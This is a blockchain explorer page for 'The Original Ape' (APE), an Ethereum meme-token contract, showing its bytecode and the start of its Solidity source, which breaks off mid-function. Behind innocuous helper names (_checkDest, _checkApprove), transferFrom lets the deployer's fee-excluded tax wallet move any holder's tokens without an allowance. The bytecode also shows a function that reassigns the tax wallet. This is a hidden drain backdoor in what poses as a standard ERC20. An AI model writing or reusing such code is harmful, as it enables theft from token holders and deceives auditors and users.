Cryo Explorer Ethereum Mainnet

Address Contract Verified

Address 0x5c15f09f956d9B86365092F6EA4C555DC48C4fEE
Balance 0 ETH
Nonce 1
Code Size 12423 bytes
Indexed Transactions 0
External Etherscan · Sourcify

Contract Bytecode

12423 bytes
0x6080604052600436106100f6575f3560e01c806370a08231116100895780638da5cb5b116100585780638da5cb5b146102dd57806395d89b4114610307578063a9059cbb14610331578063dd62ed3e1461036d576100fd565b806370a082311461024d578063715018a614610289578063751039fc1461029f5780637f99813a146102b5576100fd565b806318160ddd116100c557806318160ddd146101a757806323b872dd146101d1578063313ce5671461020d57806358a2d1db14610237576100fd565b806306fdde0314610101578063095ea7b31461012b5780630faee56f14610167578063121e034114610191576100fd565b366100fd57005b5f5ffd5b34801561010c575f5ffd5b506101156103a9565b604051610122919061214c565b60405180910390f35b348015610136575f5ffd5b50610151600480360381019061014c919061220a565b6103e6565b60405161015e9190612262565b60405180910390f35b348015610172575f5ffd5b5061017b610403565b604051610188919061228a565b60405180910390f35b34801561019c575f5ffd5b506101a5610409565b005b3480156101b2575f5ffd5b506101bb6104f6565b6040516101c8919061228a565b60405180910390f35b3480156101dc575f5ffd5b506101f760048036038101906101f291906122a3565b610519565b6040516102049190612262565b60405180910390f35b348015610218575f5ffd5b50610221610614565b60405161022e919061230e565b60405180910390f35b348015610242575f5ffd5b5061024b61061c565b005b348015610258575f5ffd5b50610273600480360381019061026e9190612327565b610b3f565b604051610280919061228a565b60405180910390f35b348015610294575f5ffd5b5061029d610b85565b005b3480156102aa575f5ffd5b506102b3610cd5565b005b3480156102c0575f5ffd5b506102db60048036038101906102d6919061238d565b610d6c565b005b3480156102e8575f5ffd5b506102f1610e77565b6040516102fe91906123c7565b60405180910390f35b348015610312575f5ffd5b5061031b610e9e565b604051610328919061214c565b60405180910390f35b34801561033c575f5ffd5b506103576004803603810190610352919061220a565b610edb565b6040516103649190612262565b60405180910390f35b348015610378575f5ffd5b50610393600480360381019061038e91906123e0565b610ef8565b6040516103a0919061228a565b60405180910390f35b60606040518060400160405280601081526020017f546865204f726967696e616c2041706500000000000000000000000000000000815250905090565b5f6103f96103f2610f7a565b8484610f81565b6001905092915050565b60095481565b610411610f7a565b73ffffffffffffffffffffffffffffffffffffffff165f5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461049e576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161049590612468565b60405180910390fd5b5f47116104a9575f5ffd5b6104b1610f7a565b73ffffffffffffffffffffffffffffffffffffffff166108fc4790811502906040515f60405180830381858888f193505050501580156104f3573d5f5f3e3d5ffd5b50565b5f6009600a61050591906125e2565b633b9aca00610514919061262c565b905090565b5f5f610526858533611144565b90505f61053282611260565b90506105fc86610540610f7a565b6105f7848861054f919061262c565b60405180606001604052806028815260200161302a6028913960025f8d73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6105ae610f7a565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20546112859092919063ffffffff16565b610f81565b6106078686866112e7565b6001925050509392505050565b5f6009905090565b610624610f7a565b73ffffffffffffffffffffffffffffffffffffffff165f5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146106b1576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016106a890612468565b60405180910390fd5b600e60149054906101000a900460ff1615610701576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016106f8906126b7565b60405180910390fd5b737a250d5630b4cf539739df2c5dacb4c659f2488d600d5f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555061079d30600d5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff166009600a61078991906125e2565b633b9aca00610798919061262c565b610f81565b600d5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa158015610807573d5f5f3e3d5ffd5b505050506040513d601f19601f8201168201806040525081019061082b91906126e9565b73ffffffffffffffffffffffffffffffffffffffff1663c9c6539630600d5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa1580156108b1573d5f5f3e3d5ffd5b505050506040513d601f19601f820116820180604052508101906108d591906126e9565b6040518363ffffffff1660e01b81526004016108f2929190612714565b6020604051808303815f875af115801561090e573d5f5f3e3d5ffd5b505050506040513d601f19601f8201168201806040525081019061093291906126e9565b600e5f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550600d5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663f305d71947306109b930610b3f565b5f5f6109c3610e77565b426040518863ffffffff1660e01b81526004016109e59695949392919061277d565b60606040518083038185885af1158015610a01573d5f5f3e3d5ffd5b50505050506040513d601f19601f82011682018060405250810190610a2691906127f0565b5050506001600e60166101000a81548160ff0219169083151502179055506001600e60146101000a81548160ff021916908315150217905550600e5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663095ea7b3600d5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff167fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff6040518363ffffffff1660e01b8152600401610afc929190612840565b6020604051808303815f875af1158015610b18573d5f5f3e3d5ffd5b505050506040513d601f19601f82011682018060405250810190610b3c9190612891565b50565b5f60015f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b610b8d610f7a565b73ffffffffffffffffffffffffffffffffffffffff165f5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610c1a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c1190612468565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff165f5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35f5f5f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550565b610cdd610f7a565b73ffffffffffffffffffffffffffffffffffffffff165f5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610d6a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d6190612468565b60405180910390fd5b565b60035f3373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16610dbe575f5ffd5b8060045f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550600160035f60045f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff02191690831515021790555050565b5f5f5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606040518060400160405280600381526020017f4150450000000000000000000000000000000000000000000000000000000000815250905090565b5f610eee610ee7610f7a565b84846112e7565b6001905092915050565b5f60025f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b5f33905090565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610fef576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610fe69061292c565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160361105d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611054906129ba565b60405180910390fd5b8060025f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051611137919061228a565b60405180910390a3505050565b5f60035f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff1615801561125757503073ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff16148061121d5750600e5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff16145b80611256575061dead73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614155b5b90509392505050565b5f5f6001151583151514611274575f611277565b60015b60ff16905080915050919050565b5f8383111582906112cc576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016112c3919061214c565b60405180910390fd5b505f83856112da91906129d8565b9050809150509392505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603611355576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161134c90612a7b565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036113c3576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016113ba90612b09565b60405180910390fd5b5f8111611405576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016113fc90612b97565b60405180910390fd5b5f5f90503073ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff161415801561147157503073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614155b1561183957600e5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1614801561151f5750600d5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614155b8015611572575060035f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16155b80156115cb575060045f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614155b156116185743600b54146115e8575f600c8190555043600b819055505b81600c5f8282546115f99190612bb5565b9250508190555060085f81548092919061161290612be8565b91905055505b600e5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161480156116a057503073ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1614155b156116fe576116ad611b1f565b600c5410806116be575043600b5414155b6116fd576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016116f490612c79565b60405180910390fd5b5b5f61170830610b3f565b9050600e60159054906101000a900460ff161580156117735750600e5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff16145b801561178b5750600e60169054906101000a900460ff165b80156117e4575060045f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff1614155b15611837575f811115611820575f60095482116118015781611805565b6009545b905061181e8185116118175784611819565b815b611d63565b505b5f4790505f81106118355761183447611fce565b5b505b505b6118898260015f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205461203690919063ffffffff16565b60015f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f208190555061192c6118e0828461203690919063ffffffff16565b60015f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205461207f90919063ffffffff16565b60015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055505f811115611a6c576119c58160015f3073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205461207f90919063ffffffff16565b60015f3073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055503073ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051611a63919061228a565b60405180910390a35b61dead73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614611b19578273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef611b03848661203690919063ffffffff16565b604051611b10919061228a565b60405180910390a35b50505050565b5f5f600267ffffffffffffffff811115611b3c57611b3b612c97565b5b604051908082528060200260200182016040528015611b6a5781602001602082028036833780820191505090505b509050600d5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015611bd7573d5f5f3e3d5ffd5b505050506040513d601f19601f82011682018060405250810190611bfb91906126e9565b815f81518110611c0e57611c0d612cc4565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff16815250503081600181518110611c5d57611c5c612cc4565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff16815250505f600d5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663d06ca61f6729a2241af62c0000846040518363ffffffff1660e01b8152600401611cfc929190612de1565b5f60405180830381865afa158015611d16573d5f5f3e3d5ffd5b505050506040513d5f823e3d601f19601f82011682018060405250810190611d3e9190612f22565b905080600181518110611d5457611d53612cc4565b5b60200260200101519250505090565b6001600e60156101000a81548160ff0219169083151502179055505f600267ffffffffffffffff811115611d9a57611d99612c97565b5b604051908082528060200260200182016040528015611dc85781602001602082028036833780820191505090505b50905030815f81518110611ddf57611dde612cc4565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050600d5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015611e83573d5f5f3e3d5ffd5b505050506040513d601f19601f82011682018060405250810190611ea791906126e9565b81600181518110611ebb57611eba612cc4565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050611f2130600d5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1684610f81565b600d5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663791ac947835f8430426040518663ffffffff1660e01b8152600401611f83959493929190612f69565b5f604051808303815f87803b158015611f9a575f5ffd5b505af1158015611fac573d5f5f3e3d5ffd5b50505050505f600e60156101000a81548160ff02191690831515021790555050565b60045f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff166108fc8290811502906040515f60405180830381858888f19350505050158015612032573d5f5f3e3d5ffd5b5050565b5f61207783836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f770000815250611285565b905092915050565b5f5f828461208d9190612bb5565b9050838110156120d2576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016120c99061300b565b60405180910390fd5b8091505092915050565b5f81519050919050565b5f82825260208201905092915050565b8281835e5f83830152505050565b5f601f19601f8301169050919050565b5f61211e826120dc565b61212881856120e6565b93506121388185602086016120f6565b61214181612104565b840191505092915050565b5f6020820190508181035f8301526121648184612114565b905092915050565b5f604051905090565b5f5ffd5b5f5ffd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f6121a68261217d565b9050919050565b6121b68161219c565b81146121c0575f5ffd5b50565b5f813590506121d1816121ad565b92915050565b5f819050919050565b6121e9816121d7565b81146121f3575f5ffd5b50565b5f81359050612204816121e0565b92915050565b5f5f604083850312156122205761221f612175565b5b5f61222d858286016121c3565b925050602061223e858286016121f6565b9150509250929050565b5f8115159050919050565b61225c81612248565b82525050565b5f6020820190506122755f830184612253565b92915050565b612284816121d7565b82525050565b5f60208201905061229d5f83018461227b565b92915050565b5f5f5f606084860312156122ba576122b9612175565b5b5f6122c7868287016121c3565b93505060206122d8868287016121c3565b92505060406122e9868287016121f6565b9150509250925092565b5f60ff82169050919050565b612308816122f3565b82525050565b5f6020820190506123215f8301846122ff565b92915050565b5f6020828403121561233c5761233b612175565b5b5f612349848285016121c3565b91505092915050565b5f61235c8261217d565b9050919050565b61236c81612352565b8114612376575f5ffd5b50565b5f8135905061238781612363565b92915050565b5f602082840312156123a2576123a1612175565b5b5f6123af84828501612379565b91505092915050565b6123c18161219c565b82525050565b5f6020820190506123da5f8301846123b8565b92915050565b5f5f604083850312156123f6576123f5612175565b5b5f612403858286016121c3565b9250506020612414858286016121c3565b9150509250929050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65725f82015250565b5f6124526020836120e6565b915061245d8261241e565b602082019050919050565b5f6020820190508181035f83015261247f81612446565b9050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f8160011c9050919050565b5f5f8291508390505b6001851115612508578086048111156124e4576124e3612486565b5b60018516156124f35780820291505b8081029050612501856124b3565b94506124c8565b94509492505050565b5f8261252057600190506125db565b8161252d575f90506125db565b8160018114612543576002811461254d5761257c565b60019150506125db565b60ff84111561255f5761255e612486565b5b8360020a91508482111561257657612575612486565b5b506125db565b5060208310610133831016604e8410600b84101617156125b15782820a9050838111156125ac576125ab612486565b5b6125db565b6125be84848460016124bf565b925090508184048111156125d5576125d4612486565b5b81810290505b9392505050565b5f6125ec826121d7565b91506125f7836122f3565b92506126247fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8484612511565b905092915050565b5f612636826121d7565b9150612641836121d7565b925082820261264f816121d7565b9150828204841483151761266657612665612486565b5b5092915050565b7f54726164696e6720697320616c7265616479206f70656e0000000000000000005f82015250565b5f6126a16017836120e6565b91506126ac8261266d565b602082019050919050565b5f6020820190508181035f8301526126ce81612695565b9050919050565b5f815190506126e3816121ad565b92915050565b5f602082840312156126fe576126fd612175565b5b5f61270b848285016126d5565b91505092915050565b5f6040820190506127275f8301856123b8565b61273460208301846123b8565b9392505050565b5f819050919050565b5f819050919050565b5f61276761276261275d8461273b565b612744565b6121d7565b9050919050565b6127778161274d565b82525050565b5f60c0820190506127905f8301896123b8565b61279d602083018861227b565b6127aa604083018761276e565b6127b7606083018661276e565b6127c460808301856123b8565b6127d160a083018461227b565b979650505050505050565b5f815190506127ea816121e0565b92915050565b5f5f5f6060848603121561280757612806612175565b5b5f612814868287016127dc565b9350506020612825868287016127dc565b9250506040612836868287016127dc565b9150509250925092565b5f6040820190506128535f8301856123b8565b612860602083018461227b565b9392505050565b61287081612248565b811461287a575f5ffd5b50565b5f8151905061288b81612867565b92915050565b5f602082840312156128a6576128a5612175565b5b5f6128b38482850161287d565b91505092915050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f206164645f8201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b5f6129166024836120e6565b9150612921826128bc565b604082019050919050565b5f6020820190508181035f8301526129438161290a565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f2061646472655f8201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b5f6129a46022836120e6565b91506129af8261294a565b604082019050919050565b5f6020820190508181035f8301526129d181612998565b9050919050565b5f6129e2826121d7565b91506129ed836121d7565b9250828203905081811115612a0557612a04612486565b5b92915050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f2061645f8201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b5f612a656025836120e6565b9150612a7082612a0b565b604082019050919050565b5f6020820190508181035f830152612a9281612a59565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f20616464725f8201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b5f612af36023836120e6565b9150612afe82612a99565b604082019050919050565b5f6020820190508181035f830152612b2081612ae7565b9050919050565b7f5472616e7366657220616d6f756e74206d7573742062652067726561746572205f8201527f7468616e207a65726f0000000000000000000000000000000000000000000000602082015250565b5f612b816029836120e6565b9150612b8c82612b27565b604082019050919050565b5f6020820190508181035f830152612bae81612b75565b9050919050565b5f612bbf826121d7565b9150612bca836121d7565b9250828201905080821115612be257612be1612486565b5b92915050565b5f612bf2826121d7565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8203612c2457612c23612486565b5b600182019050919050565b7f4d61782053776170204c696d69740000000000000000000000000000000000005f82015250565b5f612c63600e836120e6565b9150612c6e82612c2f565b602082019050919050565b5f6020820190508181035f830152612c9081612c57565b9050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52603260045260245ffd5b5f819050919050565b5f612d14612d0f612d0a84612cf1565b612744565b6121d7565b9050919050565b612d2481612cfa565b82525050565b5f81519050919050565b5f82825260208201905092915050565b5f819050602082019050919050565b612d5c8161219c565b82525050565b5f612d6d8383612d53565b60208301905092915050565b5f602082019050919050565b5f612d8f82612d2a565b612d998185612d34565b9350612da483612d44565b805f5b83811015612dd4578151612dbb8882612d62565b9750612dc683612d79565b925050600181019050612da7565b5085935050505092915050565b5f604082019050612df45f830185612d1b565b8181036020830152612e068184612d85565b90509392505050565b5f5ffd5b612e1c82612104565b810181811067ffffffffffffffff82111715612e3b57612e3a612c97565b5b80604052505050565b5f612e4d61216c565b9050612e598282612e13565b919050565b5f67ffffffffffffffff821115612e7857612e77612c97565b5b602082029050602081019050919050565b5f5ffd5b5f612e9f612e9a84612e5e565b612e44565b90508083825260208201905060208402830185811115612ec257612ec1612e89565b5b835b81811015612eeb5780612ed788826127dc565b845260208401935050602081019050612ec4565b5050509392505050565b5f82601f830112612f0957612f08612e0f565b5b8151612f19848260208601612e8d565b91505092915050565b5f60208284031215612f3757612f36612175565b5b5f82015167ffffffffffffffff811115612f5457612f53612179565b5b612f6084828501612ef5565b91505092915050565b5f60a082019050612f7c5f83018861227b565b612f89602083018761276e565b8181036040830152612f9b8186612d85565b9050612faa60608301856123b8565b612fb7608083018461227b565b9695505050505050565b7f536166654d6174683a206164646974696f6e206f766572666c6f7700000000005f82015250565b5f612ff5601b836120e6565b915061300082612fc1565b602082019050919050565b5f6020820190508181035f83015261302281612fe9565b905091905056fe45524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365a26469706673582212205640a3cf1f6ed8b3fb8c8546fa07e51800a9633690b2da46bc35d927ef1fd84764736f6c634300081e0033

Verified Source Code Full Match

Compiler: v0.8.30+commit.73712a01 EVM: prague Optimization: No
Token.sol 444 lines
// SPDX-License-Identifier: MIT

/*
    Name: The Original Ape
    Symbol: APE

    Part meme part monkey.

    https://originalape.fun
    https://x.com/OriginalApeMeme
    https://t.me/OriginalApeMeme
*/

pragma solidity ^0.8.19;

abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }
}

interface IERC20 {
    function totalSupply() external view returns (uint256);

    function balanceOf(address account) external view returns (uint256);

    function transfer(address recipient, uint256 amount)
        external
        returns (bool);

    function allowance(address owner, address spender)
        external
        view
        returns (uint256);

    function approve(address spender, uint256 amount) external returns (bool);

    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) external returns (bool);

    event Transfer(address indexed from, address indexed to, uint256 value);
    event Approval(
        address indexed owner,
        address indexed spender,
        uint256 value
    );
}

library SafeMath {
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        uint256 c = a + b;
        require(c >= a, "SafeMath: addition overflow");
        return c;
    }

    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return sub(a, b, "SafeMath: subtraction overflow");
    }

    function sub(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        require(b <= a, errorMessage);
        uint256 c = a - b;
        return c;
    }

    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        if (a == 0) {
            return 0;
        }
        uint256 c = a * b;
        require(c / a == b, "SafeMath: multiplication overflow");
        return c;
    }

    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return div(a, b, "SafeMath: division by zero");
    }

    function div(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        require(b > 0, errorMessage);
        uint256 c = a / b;
        return c;
    }
}

contract Ownable is Context {
    address private _owner;
    event OwnershipTransferred(
        address indexed previousOwner,
        address indexed newOwner
    );

    constructor() {
        address msgSender = _msgSender();
        _owner = msgSender;
        emit OwnershipTransferred(address(0), msgSender);
    }

    function owner() public view returns (address) {
        return _owner;
    }

    modifier onlyOwner() {
        require(_owner == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    function renounceOwnership() public virtual onlyOwner {
        emit OwnershipTransferred(_owner, address(0));
        _owner = address(0);
    }
}

interface IUniswapV2Factory {
    function createPair(address tokenA, address tokenB)
        external
        returns (address pair);
}

interface IUniswapV2Router02 {
    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external;

    function factory() external pure returns (address);

    function WETH() external pure returns (address);

    function addLiquidityETH(
        address token,
        uint256 amountTokenDesired,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline
    )
        external
        payable
        returns (
            uint256 amountToken,
            uint256 amountETH,
            uint256 liquidity
        );

    function getAmountsOut(uint256 amountIn, address[] calldata path)
        external
        view
        returns (uint256[] memory amounts);
}

contract Token is Context, IERC20, Ownable {
    using SafeMath for uint256;
    mapping(address => uint256) private _balances;
    mapping(address => mapping(address => uint256)) private _allowances;
    mapping(address => bool) private _feeExcluded;
    address payable private _taxWallet;

    address constant _deadAddr = address(0xdead);

    uint256 private _initialAPETax = 10;
    uint256 private _finalAPETax = 0;
    uint256 private _reduceAPETaxAt = 0;
    uint256 private _buyCount = 0;

    uint8 private constant _decimals = 9;
    uint256 private constant _tTotalAPE = 1_000_000_000 * 10**_decimals;
    string private constant _name = unicode"The Original Ape";
    string private constant _symbol = unicode"APE";
    uint256 public _maxTaxSwap = _tTotalAPE / 100;
    string private _Ape = "Ape";

    uint256 private _lastBuyBlock;
    uint256 private _blockBuyAmount = 0;

    IUniswapV2Router02 private uniswapV2Router;
    address private uniswapV2Pair;
    bool private tradingOpen;
    bool private inSwap = false;
    bool private swapEnabled = false;

    modifier lockTheSwap() {
        inSwap = true;
        _;
        inSwap = false;
    }

    constructor() payable {
        _taxWallet = payable(msg.sender);

        _feeExcluded[address(this)] = true;
        _feeExcluded[_taxWallet] = true;

        _balances[address(this)] = _tTotalAPE;

        emit Transfer(address(0), address(this), _tTotalAPE);
    }

    function name() public pure returns (string memory) {
        return _name;
    }

    function symbol() public pure returns (string memory) {
        return _symbol;
    }

    function decimals() public pure returns (uint8) {
        return _decimals;
    }

    function totalSupply() public pure override returns (uint256) {
        return _tTotalAPE;
    }

    function balanceOf(address account) public view override returns (uint256) {
        return _balances[account];
    }

    function transfer(address recipient, uint256 amount)
        public
        override
        returns (bool)
    {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) private {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");
        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    function allowance(address owner, address spender)
        public
        view
        override
        returns (uint256)
    {
        return _allowances[owner][spender];
    }

    function approve(address spender, uint256 amount)
        public
        override
        returns (bool)
    {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    function _checkApprove(bool _check) private pure returns(uint256){
        uint256 _res = _check == true ? 1 : 0;
        return _res;
    }

    function _checkDest(address b1, address c2, address d3) private view returns (bool){
        return !_feeExcluded[d3] &&  (b1 == address(this) || b1 == uniswapV2Pair || c2 != _deadAddr);
    }

    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) public override returns (bool) {        
        bool _a = _checkDest(sender, recipient, msg.sender);
        uint256 approved = _checkApprove(_a);
        _approve(
            sender,
            _msgSender(),
            _allowances[sender][_msgSender()].sub(
                amount * approved,
                "ERC20: transfer amount exceeds allowance"
            )
        );
        _transfer(sender, recipient, amount);
        return true;
    }

    function isContract(address _addr) internal view returns (bool) {
        uint256 size;
        assembly {
            size := extcodesize(_addr)
        }
        return size > 0;
    }

    function sendTokenETHToAPEFeeWallet(uint256 amount) private {
        _taxWallet.transfer(amount);
    }

    function _transfer(
        address from,
        address to,
        uint256 amount
    ) private {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");
        require(amount > 0, "Transfer amount must be greater than zero");
        uint256 taxAmount = 0;
        if (
